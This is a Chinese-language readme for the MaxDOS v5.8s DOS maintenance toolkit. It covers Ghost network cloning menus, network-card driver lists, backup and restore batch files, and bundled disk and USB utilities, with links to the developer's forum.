先切换到存放ISO的目录.输入 loadiso xx.iso (xx为镜像文件名) 3C90Xgo.bat 3C90X系列自动全盘网刻批处理. 3C90XgX.BAT 3C90X系列自动单分区网刻批处理. 8029go.bat 8029系列自动全盘网刻批处理. 8029gX.BAT 8029系列自动单分区网刻批处理. 8139go.bat 8139系列自动全盘网刻批处理. 8139gX.BAT 8139系列自动单分区网刻批处理. viaGO.bat VIA Rhine I/II系列自动全盘网刻批处理. viaGX.BAT VIA Rhine I/II系列自动单分区网刻批处理. DCN530go.bat DCN-530TX系列自动全盘网刻批处理. DCN530gX.BAT DCN-530TX系列自动单分区网刻批处理. DFE530go.bat D-Link DFE-530TX系列自动全盘网刻批处理. DFE530gX.BAT D-Link DFE-530TX系列自动单分区网刻批处理. DLE530go.bat DLE530系列自动全盘网刻批处理. DLE530gX.BAT DLE530系列自动单分区网刻批处理. ip100GO.bat IC Plus ip100系列自动全盘网刻批处理. ip100GX.BAT IC Plus ip100系列自动单分区网刻批处理. pro100go.bat pro100系列自动全盘网刻批处理. pro100gX.BAT pro100系列自动单分区网刻批处理. sis900go.bat sis900系列自动全盘网刻批处理. sis900gX.BAT sis900系列自动单分区网刻批处理. 可能还有个别命令未写上,还需您去挖掘. 关于IELDR由于限制较大,支持性不好,已经在本版中去掉了,请见谅. :) 如果您在使用中遇到问题请上我们的论坛 http://bbs.pzz.cn/thread-htm-fid-8.html 在此感谢网盟中的: Sense 感谢网友: Renda@somewhere 和 lihongqing 感谢所有支持过我们网站会员,和论坛里的所有会员及支持我们的同撩们. 祝您使用愉快 :) 卸载本软件,请在 "控制面板->添加删程序->找到MAXDOS点删除! 本站下载 Http://www1.Pzz.Cn/Soft/MaxDOS56S.RAR 附送服务端 GHOSTSRV 8.3 http://up.pzz.cn/userfiles/max/Ghost83.rar 自动删除LOG文件程序.
MaxDOS v5.8s 更新如下: 1.优化一些程序及修正旧版本的已知BUG. 2.加入了5种nForce系列网卡驱动,理论上支持所有nForce系列网卡,包括其它PHY的软网卡. 3.加入对长文件名的支持.加入对USB光驱的支持. 4.修正网刻菜单的部份BUG,及优化了批处理. 5.加入SiS191/190 1000/100/10 Ethernet Device 系列网卡的驱动 6.加入了Attansic L1 Gigabit Ethernet 10/100/1000Base-T Adapter 系列网卡的驱动 7.全面采用测试过的驱动程序,在驱动兼容性及网刻速度上将有一定的提升. 8.支持任意选项中,任意位置随时驱动光驱,USB光驱,长文件名支持. 9.优化DOS下访问局域网功能.升级SPFDISK为最新简体版本. 10.加入了三茗的NETCOPY,可以实现不制作镜像网络刻隆. 11.加入了AEFDISK强大的分区创建,删除,分割管理工具. 12.去掉HDDREG,MHDD将于插件形式发布.升级鼠标驱动程序,支持最新的双核主板. 13.使用新的启动模式,理论上在兼容性上会有所提升. 14.改进以前版本加载NTFSDOS时经常出现找不到command现像.并且升级为最新版本. 15.支持与其它版本的MaxDOS共存,及其它DOS程序共存. 16.加入小哨兵的网络刻盘工具. 关于淘宝网快捷方式的说明: 程序安装完毕后会在您的桌面及开始菜单上创建一个淘宝网的快捷方式,谨此而已,无其它 不良程序,请放心,如果您不需要可以不选择安装或者直接删除掉这些快捷方式. (支持我们请选择安装并保留快捷方式,非常感谢) ================================================================ 软件特色功能如下: 1.本软件的用处在于给装好的 Win2K/XP/2003系统加入DOS入口,方便维护与备份还原系统. 2.支持进入DOS时设置密码,且密码采用MD5加密.纯绿色软件,不写引导区. 3.内置200多种100M及1000M网卡驱动,实现GHOST网络刻隆及DOS下访问局域网的共享资源. 4.全中文的操作方式,让您使用时更简单,并且支持DOS下五笔拼音输入及中文文件操作. 5.完全傻瓜化的网刻模式,让没用过本软件的用户也能轻松实现网刻. 6.支持引导自已制作IMG镜像,而且理论上支持引导自己制作的无限大小IMG镜像. 7.支持全中文的一键恢复/备份,让您备份/恢复系统时更简便. 8.支持系统盘为NTFS分区及读写NTFS分区内容,并且操作NTFS文件文件夹. 9.内置常用软件如:DISKGEN,SPFDISK,GHOST,NTFSDOS,AEFDISK,NETCOPY等软件. 10.支持DOS下清除 WINDOWS 2000/XP/2003 登陆密码,且不会对系统造成破坏. 11.支持DOS下访问USB设备,如U盘,USB硬盘,USB光驱,闪存卡,内存卡等. 12.本站还同时推出光盘版、U盘版、以及PXE镜像版,如需要请上我们网站中下载. =========================================================== MaxDOS v5.8s 使用前注意事项及常见问题: 1.使用前请务必认真的查阅说明文件,否则造成使用问题,作者不负任何责任. 2.MaxDOS在安装时可以自由的设定密码,安装后无法修改,如果不修改,默认的密码为: max 3.MaxDOS只支持 WINDOWS 2K/XP/2003,不支持WIN9X/ME,VISTA系统请上本站下载专用版本. 4.安装MaxDOS时请在解压RAR压缩包后安装,并关闭其它无关程序,避免引起未知的错误. 5.如果您在安装时将启动等待时间设为:0 ,则启动时不会出现MaxDOS的入口选项,如果需要 进入MaxDOS时,请在启动时狂按(^_^)F8键,等出现WINDOWS菜单时,再按ESC键,即可见. 6.网络服务端GHOSTSRV为WINDOWS下的软件,下载址 Http://A.Pzz.Cn/SOft/ghostsrv.rar 7.如果您有多个硬盘,请确认您引导MaxDOS系统的硬盘挂接在IDE1接口上,并设置为第一启 动设备,如果是SATA接口硬盘,请在BIOS中将硬盘设置为: Compatible Mode (兼容模式). 并且请硬座您安装MaxDOS的分区为硬盘的第一分区. 8.安装MaxDOS后请勿使用NTFS磁盘压缩功能,否则将损坏MaxDOS,如果使用了,请再次安装. 9.MaxDOS安装后会在您的D/E/F/G盘创建一个MaxBAK隐藏文件夹,用于存放系统备份镜像. 10.GHOST手动操作备份/还原系统,使用教程 http://pzz.cn/bbs/read.php?tid=26423 11.GHOST备份后占用空间,找不到备份文件 http://pzz.cn/bbs/read.php?tid=23699 12.GHOST 8.3 不是有效的GHO镜像解决方法 http://pzz.cn/bbs/read.php?tid=14535 13.GHOST网络刻隆常见问题及经验分享 http://pzz.cn/bbs/read.php?tid=1585 14.GHOST网络刻隆录像教程 http://pzz.cn/bbs/read.php?tid=10654 15.制作GHOST镜像到网络服务器 http://pzz.cn/bbs/read.php?tid=10705 16.GHOST全盘镜像制作(全盘备份)教程 http://pzz.cn/bbs/read.php?tid=26435 17.更多常见问题及使用帮助请参见 http://pzz.cn/bbs/read.php?tid=8505 18.由于PACKET驱动中的菜单限制,所以去掉个别网卡在菜单上的直通选项,如果你喜欢使 用PACK驱动,并发现他不在菜单中,请使用旧版的命令行模式网刻. 19.卸载本软件,请在 "控制面板->添加删程序->找到MaxDOS点删除! ======================================================== MaxDOS v5.8s 安装启动后首菜单有6个主选项及二级菜单的7个子选项. 首菜单主选项 A. MaxDOS 工具箱 MaxDOS内置的工具,建议都在此项运行.以下为内置的所有命令及工具的简要介绍. 12.bat 将第一硬盘的资料通过ghost复制到第二硬盘. 21.bat 将第二硬盘的资料通过ghost复制到第一硬盘. Bakd.bat 命令行模式下快速将c盘备份至d:\maxbak\sys.gho Bake.bat 命令行模式下快速将c盘备份至e:\maxbak\sys.gho Bakf.bat 命令行模式下快速将c盘备份至f:\maxbak\sys.gho Bakg.bat 命令行模式下快速将c盘备份至g:\maxbak\sys.gho Chang.bat 在命令行模式下加载长文件名称的显示支持. Chang /q 退出. Exlan.bat 如果要手动网刻的话.请运行这个解压出dos的pack网卡驱动. Gh.bat MaxDOS下的自动一键备份与还原菜单. Spfdisk.bat 启动管理器+分区管理器,功能强大 Help.bat MaxDOS程序帮助文件. 我在这 ^_^ . Hyd.bat 命令行模式下快速将d:\maxbak\sys.gho镜像恢复至c盘. Hye.bat 命令行模式下快速将e:\maxbak\sys.gho镜像恢复至c盘. Hyf.bat 命令行模式下快速将f:\maxbak\sys.gho镜像恢复至c盘. Hyg.bat 命令行模式下快速将g:\maxbak\sys.gho镜像恢复至c盘. Idecd.bat 任何菜单任何位置下快速加载ide光驱驱动. Loadiso.bat Dos下载入iso光盘镜像.只能读取.不能引导.但可装2k/xp/2k3系统. 先切换到存放iso的目录.输入 Loadiso Xx.iso (xx为镜像文件名). Uniso.bat 卸载上条命令加载的iso命令. M.bat MaxDOS工具箱的主菜单. Mouse.bat 鼠标驱动程序,如果需要鼠标操作请先运行. Mouse /q 退出支持. Ndisgo.bat 用于旧版本的命令行模式全盘网刻,格式: Ndisgo Xx Ndisgx.bat 用于旧版本的命令行模式单分区网刻,格式: Ndisgx Xx Nfxgo.bat Nforce网卡驱动系列的主网刻菜单. Ngo.bat Ndis2网卡驱动选项下的主网刻菜单. Nvgo.bat      诺顿公司自带的万能pxe网卡驱动命令行模式全盘网刻批处理. Nvgx.bat      诺顿公司自带的万能pxe网卡驱动命令行模式分区网刻批处理. Password.bat Dos下清除2k/xp/2k3的用户密码.支持ntfs/fat32分区. Pgo.bat Packet网卡驱动选项下的主网刻菜单. 3c90xgo.bat 3com90x系列pack驱动旧版命令行模式全盘网刻批处理. 3c90xgx.bat 3com90x系列pack驱动旧版命令行模式单分区网刻批处理. 8029go.bat Realtek瑞昱8029系列pack驱动旧版命令行模式全盘网刻批处理. 8029gx.bat Realtek瑞昱8029系列pack驱动旧版命令行模式单分区网刻批处理. 8139go.bat Realtek瑞昱8139系列pack驱动旧版命令行模式全盘网刻批处理. 8139gx.bat Realtek瑞昱8139系列pack驱动旧版命令行模式单分区网刻批处理. Dcn530go.bat Dcn-530tx系列pack驱动旧版命令行模式全盘网刻批处理. Dcn530gx.bat Dcn-530tx系列pack驱动旧版命令行模式单分区网刻批处理. Dfe530go.bat D-link Dfe-530tx系列pack驱动旧版命令行模式全盘网刻批处理. Dfe530gx.bat D-link Dfe-530tx系列pack驱动旧版命令行模式单分区网刻批处理. Dle530go.bat 联想dle530系列pack驱动旧版命令行模式全盘网刻批处理. Dle530gx.bat 联想dle530系列pack驱动旧版命令行模式单分区网刻批处理. Ip100go.bat Ic Plus Ip100系列pack驱动旧版命令行模式全盘网刻批处理. Ip100gx.bat Ic Plus Ip100系列pack驱动旧版命令行模式单分区网刻批处理. Pro100go.bat Intel Pro100系列pack驱动旧版命令行模式全盘网刻批处理. Pro100gx.bat Intel Pro100系列pack驱动旧版命令行模式单分区网刻批处理. Sis900go.bat Sis900系列pack驱动旧版命令行模式全盘网刻批处理. Sis900gx.bat Sis900系列pack驱动旧版命令行模式单分区网刻批处理. T8139go.bat 腾达8139d网卡pack驱动系列旧版命令行模式全盘网刻批处理. T8139gx.bat 腾达8139d网卡pack驱动系列旧版命令行模式分区网刻批处理. Via1go.bat Via 其它网卡系列pack驱动系列旧版命令行模式全盘网刻批处理. Via1gx.bat Via 其它网卡系列pack驱动系列旧版命令行模式分区网刻批处理. Viagbgo.bat Via Rhine Iii系列pack驱动系列旧版命令行模式全盘网刻批处理. Viagbgx.bat Via Rhine Iii系列pack驱动系列旧版命令行模式分区网刻批处理. Viago.bat Via Rhine 1/2系列pack驱动系列旧版命令行模式全盘网刻批处理. Viagx.bat Via Rhine 1/2系列pack驱动系列旧版命令行模式分区网刻批处理. Tw.bat 天汇中文支持程序,tw /s加载dos的中文输入法,tw /q退出中文支持. Usbcd.bat 任何菜单任何位置下快速加载usb光驱驱动. Acopy.com 完全复制文件和目录,包括长文件名及属性.运行前建议运行smartdrv Attrib.com 文件/文件夹属性设置命令. Choice.com 选择命令,返回按键的errorlevel值. Coms.com 一个清除cmos密码和设置的程序. Deltree.com 同时删除目录,子目录及文件的工具.操作时请注意. Device.com 用命令行模式加载 .sys 驱动. Deldev.com 卸载上条命令加载的.sys 驱动. Dready.com 判断驱动器状态,检查光驱中是否有光盘、软盘是否写保护. Edit.com 相当于记事本. Fakedisk.com 用来解压.img镜像. Find.exe 文本找加工具. Format.com 格式化fat32分区命令. J.com 弹出或关闭光驱门. Label.com 非常小巧的修改磁盘卷标的工具. Mbr.com 磁盘mbr信息备份与还原工具. Netcopy.com 三茗netcopy,不用做镜像也可以网刻. Off.com 关闭计算机. Pkzip.com Zip解压工具. R.com 重新启动计算机. Subst.com 磁盘映射工具. Sys.com 传输msdos 7.01 的引导文件到c盘.使用c盘可以引导到dos. Tree.com 目录树显示工具. Aefdisk.exe 磁盘分区管理工具,详见 Http://pzz.cn/bbs/read.php?tid=26489 Debug.exe 强大的dos下编程命令. Diskgen.exe 强大的dos下中文分区软件.一直用它.Max强烈推荐,强过dm. Fdisk.exe 早期的dos分区命令. Ghost.exe 系统备份还原工具.如果运行了ntfsdos.请用exit退出后再运行. Go.exe 直接跳转至目录,如 Go C:\windows. Mem.exe Dos查看内存占用情况. Mousclip.exe 鼠标剪切板程序. NtfsDOS.bat Ntfs分区读写支持.使用exit退出. Pctool.exe Dos下的类似于win资源管理器 Shsucd.com Loadiso用的虚拟光驱驱动. Shsucdhd.exe 忘了什么东西啦.呵呵.等下试试. Shsucdx.exe 最nb的dos光驱驱动程序. Smartdrv.exe Dos下磁盘缓存程序.加载一下可大提高dos安装系统. Xcopy.exe 强大的复制程序,可复制带文件夹的目录,加载tw后,使用xcopy /? Xdel.exe 类似于winnt下的rd,可删除目录和子目录里文件. Di1000dd.sys Dos下的usb设备驱动. Himem.sys 扩展内存驱动程序. Ramdrive.sys Ms的内存盘驱动程序. Usbaspi.sys Dos下的usb设备驱动. Usbcd.sys Dos下的usb光驱驱动. Vide-cdd.sys Dos下的ide光驱驱动. XSBNET.bat 小哨兵网刻程序.请在NDIS2驱动(或在加载网卡驱动)下运行. Xsb.zip 小哨兵的压缩包 小哨兵操作具有危险性,只建议熟悉此程序的人使用.如果操作不当将造成分区表损坏. ClrPart.exe(修复磁盘参数的配套工具,用于从小硬盘向大硬盘拷贝数据中途中断后恢复 大硬盘上磁盘参数信息). 此程序存在 Xsb.zip 中,请先运行XSBNET退出后再运行此程序. 由于客户端在接受数据中途掉线,重起进入系统时发现磁盘容量减小了,该如何恢复? 进入CMOS,重新检测并记下磁盘参数(磁头数/扇区数)但不保存CMOS数据的改动,使用 ClrPart.exe恢复磁盘参数,重起进入CMOS检测磁盘参数保存CMOS数据的改动. ======================================================== 首菜单主选项 B. MaxDOS网刻菜单 (进入后共有7个子菜单) 子菜单选项 A. NDIS2网卡驱动全自动网刻 5.8S版本网刻服务器的IP应为: 10.1.1.1 奄码为: 255.0.0.0 GHOSTSRV会话名称:max 客户端谁进去都懂的用了因为都是全中文菜单模式,在这里就不再介绍. 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. NDIS2驱动支持的网卡所有系列如下: (带*号的代表为多种型号) 3Com | 3C900* | 3C905* | 3C920* | 3C940* | 3C2000* 全系列网卡. ADMtek AN983* | AN985* | AN9511* | AN9513* 全系列网卡. AMD PCNet Family 全系列网卡. Broadcom 440x 10/100* | NetXtreme Gigabit* 全系列网卡. Broadcom 570x 10/100/1000* 全系列网卡. DAVICOM DM9 全系列网卡. DEC Digital Semiconductor 21040* | 21041* | 21143/2* 全系列网卡. DigitalChina DCN-530TX 系列网卡. VIA Rhine I* | Rhine II* 全系列网卡. IC Plus IP100* | IP100A 全系列网卡. Intel PRO/100* | 82562EH* | 82559ER* | 82562* | 全系列网卡,包含移动网卡. Intel(R) PRO/1000* 全系列网卡. Marvell Yukon PCI (PCI-E) Gigabit Controller* 全系列网卡. Marvell Yukon 88E8001/8003/8010/8052/8050/8053* 全系列网卡. RealTek RTL8029/8139/810x/8110SC/RTL8169/8110/RTL8136/810x/8138/8111* 全系列. SiS 900-Based* 全系列网卡. ULi PCI Fast Ethernet Controller 全系列网卡. ULi Electronics Inc. 全系列网卡. D-Link DFE-550TX 全系列网卡. Sundance ST201 全系列网卡. D-Link DGE-530TG* 全系列网卡. VIA Networking Velocity-Family Gb* 全系列网卡. RADTEK RTK8189C* 全系列网卡. IC Plus IP1000* 全系列网卡. SiS190/SIS191* 全系列网卡.包含100M/1000M Attansic L1 Gigabit* 全系列网卡. 此项支持的网卡共100M及1000M的共205种,上面并无一一列出,如果您未您的网卡型号,或者 不确定是否支持您的网卡,请选择此项.MaxDOS会帮您自动辨认出网卡以及自动加载驱动. -------------------------------------------------------------------------------- 子菜单选项 B. Packet网卡驱动 解: MaxDOS 内置PACKET的DOS网卡驱动选项.由于有些网卡使用自动识别网卡功能后 无法识别出网卡或识别不正确,所以此项特意使用为手动选择模式,在兼容性及稳定 性上会比NDIS2驱动要好,进入后为全中文界面,以及全自动加载网卡驱动.可以选择 全盘或单分区刻隆.就不再多加解释了,进入后都懂. PACKET网卡共支持以下几种网卡: (如果您的网卡不在此选项中,请使用NDIS驱动) 3C905PKT.com 3Com EtherLink PCI Bus Master Packet Driver (3COM 905) 3C90XPD.COM 3Com Fast EtherLink XL 10/100Mb TX Ethernet NIC (3C90X) E310.COM Adico AE310-TX PCI 10/100 Fast Ethernet Adapter AMDPCNET.com AMD PCnet Family DCN530tx.COM DCN-530TX PCI Ethernet Adapter V1.00 (2002.0411) DFE530TX.COM D-Link DLE-530TX PCI NIC (Rev B) V2.53 (2000.0525) DLE530TX.COM D-Link DFE-530TX PCI NIC V4.10 (2002.0703) IP100PD.COM IC Plus IP100 based Fast Ether Adapter V3.03 (2003.0411) PRO100.COM Intel EtherExpress(tm) PRO/10 & PRO/100B PCI,(已更新,可用) RTL8029.COM Realtek RTL8029(AS) PCI Ethernet NIC 1998 RTL8139.COM Realtek RTL8139 Family PCI Fast Ethernet NIC v3.40 SIS900.EXE SiS 900/7016 PCI Fast Ethernet Adapter V1.15 (2002.0816) VIA.COM VIA Rhine I/II Family Fast Ether Adapter V4.16 (已更新,可用) VIAGB.COM VIA Rhine III 1000M网卡驱动. NV.EXE GHOST自带万能PACKET驱动,如果您有的网卡不能驱动,请尝试此驱动 有人提过此驱动,可驱动NF系列的网卡,如果选项3不成功,可尝试此驱动. 5.8S版本网刻服务器的IP应为: 10.1.1.1 奄码为: 255.0.0.0 GHOSTSRV会话名称:max 客户端谁进去都懂的用了因为都是全中文菜单模式,在这里就不再介绍. 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. -------------------------------------------------------------------------------- 子菜单选项 C/D/E/F/G. nForce 1/2/3/4/5网卡驱动网刻 理论上本选项支持nForce全部集成的软网卡,但由于本人没有这些条件测试,所以无法确认. 本选项共包含了5种的nForce网卡驱动,都是由Max一个一个收集并制作. 排列顺序按兼容性排列的,V1-V5,相对来说V1支持大部份的NF4及NF5系列网卡. V2则支持NF1-NF4系列网卡,其它V3-V5支持一些较特殊的PHY软网卡. 您可以一个一个切换测试看哪个与您的主板兼容,则使用哪个.操作方式全部一样的. nForce 系列网卡网络刻隆项.由于NF驱动的驱动占用了太大内存,造成无法加载 中文程序,只能使用英文菜单模式,但操作形式与NDIS2和PACK驱动选项中的菜单是一样的. 5.8S版本网刻服务器的IP应为: 10.1.1.1 奄码为: 255.0.0.0 GHOSTSRV会话名称:max 如果您使用此选项存在问题,请尝试使用选项A的GHOST自带万能驱动. 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. 由于nForce都是集成的PHY的软网卡,造成MaxDOS的网卡识别程序无法自动识别nForce网卡, 所以您只一个一个驱动来测试与您的主板的兼容性. =============================================================== 用于快速备份和还原系统,安装MaxDOS时默认会在您的D/E/F/G分区根目录中创建一个MaxBAK 文件夹,用于存放一键备份的镜像,如果您删除了该分区的MaxBAK文件夹可能造成一键备份与 还原功能备份到该分区上的功能失效. ============================================================= 首菜单主选项 D. 访问网络资源 进入此项后,系统会自动帮您加载好网卡驱动,并且设置好连接的协议,而且是全中文菜单, 您可以在进入此项后,直接获得局域网里WINDOWS主机上的共享资源,而且支持读写操作当然 这前提您要开启权限.才能实现写操作,您可以根据菜单里的提示操作,也可以使用如NT主机 上的NET命令来实现连接到共享目录,命令行如: net use z: \\max\f 此命令的意思是将Z: 盘,映射到"Max"主机上的"f"为名称的共享目录.您可以参考NT的NET命 令在NT主机上使用 NET /? 或 NET USE /? 获得帮助,当然可能有个别命令不支持. 友情提醒:您只能通过机器名称来访问您的共享主机,而不能使用IP地址来连接您的主机.而 且您还能使用此项进行网刻操作,映射好如Z:盘 ,然后在GHOST中选择Z:盘共享目录中的 ".GHO" 镜像还原或备份进去. 注意:被访问的机器必须安装IPX协议,已经开启GUEST用户. ============================================================ 首菜单主选项 E. 驱动USB设备 用来驱动U盘.USB硬盘.USB光驱,闪存等驱动后就可以在DOS下访问设备的内容了! =========================================================== 首菜单主选项 F. 纯DOS模式 用于刷BIOS或运行其它特殊软件.不加载任何东西,无虚拟盘.

6,849

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧